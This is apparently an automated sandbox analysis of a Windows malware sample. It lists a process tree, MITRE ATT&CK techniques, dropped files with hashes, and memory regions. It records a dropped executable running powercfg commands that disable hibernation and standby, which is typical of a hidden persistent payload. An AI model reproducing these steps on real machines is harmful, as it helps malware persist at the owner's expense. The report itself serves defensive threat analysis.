C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4108 -ip 4108
1⤵
PID:4820

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
1⤵
- Executes dropped EXE
PID:4468
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e4f80e7950cbd3bb11257d2000cb885e

SHA1
10ac643904d539042d8f7aa4a312b13ec2106035

SHA256
1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

SHA512
2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dc1a9f2f3f8c3cfe51bb29b078166c5

SHA1
eaf3c3dad3c8dc6f18dc3e055b415da78b704402

SHA256
dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

SHA512
682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
408B

MD5
3a04243dd976ccdfcfa4245c5da332b0

SHA1
1b100b36d1586ff05590109598b9897b1e88f9b0

SHA256
a10b1072b390ea3223f48eb44451584cc989f9a682704d26db39bb6785c960b9

SHA512
1f32fccde13ba6c46ad3d970c146d678b3a0a9276913781f25068505c21a9b6864185d37992b394bc30ad594ecb10126b268728be7f35fe55c0e8986e256abd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
3f14d54bcf3708272060619a91f7f486

SHA1
e06e21fbbf93203897fb4d0df6510c27879d2d1e

SHA256
d8781c942788773771ae97e8260c9590720ba03b5eec030c7813d870393363e5

SHA512
7210b1b739c1efc10ae2c7e34e43140e54c75748c74d256b019992d4e3944ee2d9371ac44d4985dbb21d921b32a04e40e8605a58b89e955be9f1389044ab0344

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
060d9ab173e7fb412f825cf3c18f5231

SHA1
981781420552b0b87dde32333b75f4f7eb5cf4b9

SHA256
a4530d3fce3c144376c1547bad08c910df0672abdd8d399ab611b0cb56e194d5

SHA512
c7f9426acafa1644b835af36300c26045bd8a36ea9a0f82cdeca93e5759f93388819c7ced42ff7bb6a0cb1ca967ca6376015b04b85dfc68cf7883112ad7ce78a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
666ddd9dbceb3d1ea88eff88accc3b8c

SHA1
57743f575ecfa04baa58193bac8afbae645a6168

SHA256
a33adcbb4e91c5738c0a2a2e72e8cdd50cd8ddfcc8cba517e9d790390c0c5213

SHA512
cd4ce4d6d959591135d2a9f504b91ee21b68778fc3dbbf62a58e0ded0aac5ea13e0474514b066d2c5ca13f615c113652364e8df89541ddc1557f77c82c944ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e039697af2c3adf65987bdfa9e404f21

SHA1
d4b01cfa89a510949ff368816fb8790201cf3883

SHA256
532b57899b277f4219fb6026dfd5d45bc86839dff26e037871f267db7ac608d2

SHA512
d007ad556b16bf161f140989b10db3196eaa1aa40c114d45a85821521f993b3dcaaae4f698fbce6c5874cb31ea077f9302131b2d48dee64c01df00095a16e8aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
458614b07c1e66a0fa649db031e4bb4b

SHA1
bdb6a4318bd22e98174c04d06b28316ffc390ba3

SHA256
a7af3c491867f7e00e98d46296def6bdd74aa244fe8540da716d82c9a9c4c9c5

SHA512
955ffcce0402ef67fa2a91bafba3433726aa8dc1617e6fc26882cae10a3631bb049980d11ebf5bcdc3eef2347526301f19f49aafe95e96ac05c1206d5f4a8b82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1c32cc455281b3eba8b5567c7ed03309

SHA1
8e440257086ea3b7a6341a6428da16c155755fb6

SHA256
e98d7c7e4649e1cc0f3748a5c1b386ef3c0e8cc0b954eefa650a22e85eb95f64

SHA512
45dfc71ea223bc8fc079e7785914fdb5a645cb3f3ccc73412e963c7be9d5a6f00b27e35339f47baa123a13a464af0d799c04bfa89dd16178545d78ad14196cff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
dc77697b471137f90c1895bbd701bcc6

SHA1
12bdf92f7ff9959d6de0f0a5b73287b49199b5e5

SHA256
ba6ff19a73ae806ddd863b453ce58aec188f8a7165559870ad9436dbc24e414a

SHA512
1523b99fdfa3a452549ce600cabc8106ae0fe54bfd4782b18b2a1ce177319257645348120001a0f9ad53fce2554151ceed1a7fc90df8fa319347e4bfb61eaa43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57dc08.TMP

Filesize
1KB

MD5
7f155b057d6455e6684eac1eb26e9c37

SHA1
3eea4c7f6ff9471bf914fedd2ae60f0ac728aa9c

SHA256
32829fbe31e14f76642450e9a6d6b4312288962fb6fd135f2eb1e4a91036058b

SHA512
9437041aec99f5b5a02b92630774748e4cb183ed4cbf98ba6ec1d4a54cd81af9222f5d373f708638f7a6819d12f7eed930c3191124199ac83b088e3fd2e14d29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
668918065683e2233d3d79bfd6dda21a

SHA1
59f2c1501cc67bc357165eb2d468ee07b0d79f08

SHA256
71a56f27efe9d6428bc7e9b8780148c1caf0044a2f05611947705f7d79eec2f2

SHA512
9b6c036bd60a37be55f0aafbc42e4350efa9e9d6af288a07daa44123219966231d8158466fb5c8b936d383687dab50ca043534ec19b365172697107609295f8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
eae207bb95051782a2baa2fbf24bb349

SHA1
6fe137ec4887f20553075cbf4583893636d9b53c

SHA256
84ef326358cb67c3dc826506a626cb5f0401eb6f110c51bade244ede5e61c104

SHA512
35b9f55e1dad7083543b3df44e1810a9882e16cd7a9efdf95a568035bb7a094ba3c1fc1bc738b0963a1bfe83f5da28303946f2be11fcce638e5d11f3fabaf7dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1542328a8546914b4e2f1aef9cb42bea

SHA1
7a0ac5969dfb20eb974e8a3bd8707243fa68f94f

SHA256
7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737

SHA512
b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0dad0d57977024a11d87b257201ec93f

SHA1
2ab0fe8f65b06bba5065ea8163677a627d176b53

SHA256
f270e31f25c53a0bcee3388ceefb080643247f75f27184ab1c7701a6ecd713a3

SHA512
b191c0191274c03153a04a319d7ba40c4f4b8bf3481c67666e804c67048aca7fbcbd23f05c66ca8e55d8aa1e79ac8dcaa72d15ffcfc26930737e100b03dbf88c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
66cd4d95adce149871e46aee27fdd4cd

SHA1
382343ef4cbc8801d9a9e4c851d65ee8529585a7

SHA256
ddb5ce7f7900966d4b316d003bfc72639895723b468477c51600681fc13cf664

SHA512
8f45c79f3b89bfaf5ec9269d193d92d1edf2e42faf6ba09198ea5f8fb049eb4c923ffbeed4d950649f7c7f8cea2e66566e2e9da2e26b09f64ac17c275ffcbad4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fbd949ee880d625d6ccdf8af75fb7d0e

SHA1
43a49fc5ef378a258299dcaf328e8d706adcba01

SHA256
54ce0572179be1c71acc519f8a58b0ab55fef0f6dec0e638ca5ed1bd82783e2d

SHA512
a2526a93e70ce2d7b37cf439f88eda5f85cebb2d413ad84bf037d169629be4439b88477efe592714e587e3b40968b45c18423974f748fee58842b20e70a382bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ea91a1e20ada48def85e41a3e09552ba

SHA1
b7a6b2ddad41f0506fad83e31b269ab876068f1b

SHA256
f77c98146ff07925c366da70b586a3e0e45ef560e9a8ec48eedc1bf4cacd7a21

SHA512
b5f2241235b97bf5530a9d61ec5af4f92ed0c22f19c4e37add0aac93ee3aba3f96f602a015769f65b2c80317c31757b4755411ca308edb124ccb5d89a520e7ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbgfoynu.hol.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe

Filesize
750KB

MD5
fe1e0e5d7d7fab24c75fcc81a1b8ace7

SHA1
4dc3c5f40335177ebbb404a274423ad5270f9fba

SHA256
e7a0002641ca738c33fc0f978dda0d72521e9aef53d680df56d73cf4e1ddc8b2

SHA512
205968952775ed1cb2eece128bd70059933ab9b8b85fd18c9af88f475f8b1d8ed29c419a048e12652268cba0ec4eea67c0b7d1642c4b449afd0595279a40142b

Download Submit
C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe

Filesize
2.6MB

MD5
7ccc1d23fb8184771030e688a3c4baa4

SHA1
3a80f56d66b051333d90e5bab1f8c9e2129dcce5

SHA256
4789e3570e78cce1c18090584916a342dddb809b11fab46a7bc8bd87f681c736

SHA512
d04a451629ddcbc53ec480fbe7557666d6433660724f1973f9d400f1ee0e1a619e3da7f263789c74672480fb391b269d64f956837933e0c88996a852dbd260b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\support.rar

Filesize
2.4MB

MD5
f0cd1461ed346e9971b287e2d4f6067b

SHA1
42cc7e08f366e163d8cc0d15bf92eb47584af4ce

SHA256
3703dd2c76c79138350d25ce219223d8210969e8b6c28300447dd7be003791c5

SHA512
92424bd947caa10342622e5f4b421221ff6af2539bd19ff2f7c4c47fa7687cba7d338b6d0e1ec5c475d1606c5b26c30a2cd4a640b4c3d033571a47777cb2bda7

Download Submit
C:\Users\Admin\Desktop\NursultanNextgen2024\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Windows\TEMP\cmptxwbydfnp.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
memory/2328-208-0x000002C444910000-0x000002C444932000-memory.dmp

Filesize
136KB

Download
memory/3248-335-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-331-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-263-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3248-392-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-328-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-329-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-332-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-333-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-334-0x0000024BEA1A0000-0x0000024BEA1C0000-memory.dmp

Filesize
128KB

Download
memory/3248-269-0x00000000058F0000-0x0000000005956000-memory.dmp

Filesize
408KB

Download
memory/3248-330-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-327-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-391-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-336-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-338-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-339-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3248-337-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3428-137-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-138-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-130-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-129-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-128-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-140-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-139-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-134-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-135-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/3428-136-0x000001DD95A20000-0x000001DD95A21000-memory.dmp

Filesize
4KB

Download
memory/4888-320-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4888-319-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4888-323-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4888-326-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4888-322-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4888-321-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download